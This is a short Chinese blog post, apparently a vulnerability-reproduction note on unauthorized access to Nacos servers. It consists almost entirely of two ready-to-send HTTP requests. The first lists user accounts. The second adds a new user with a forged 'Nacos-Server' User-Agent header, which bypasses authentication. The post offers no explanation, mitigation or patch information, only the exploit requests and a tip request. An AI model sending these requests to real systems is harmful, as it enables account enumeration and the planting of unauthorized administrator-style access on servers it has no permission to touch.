Nacos 未授权访问

作者: print("") 分类: MISC,PWN,WEB安全,漏洞复现 发布时间: 2021-01-14 09:15

用户列表size代表用户数量

GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Nacos-Server
Connection: close

添加用户接口

POST /nacos/v1/auth/users HTTP/1.1
Host:xxxx.xxxxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Nacos-Server
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=test&password=test

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注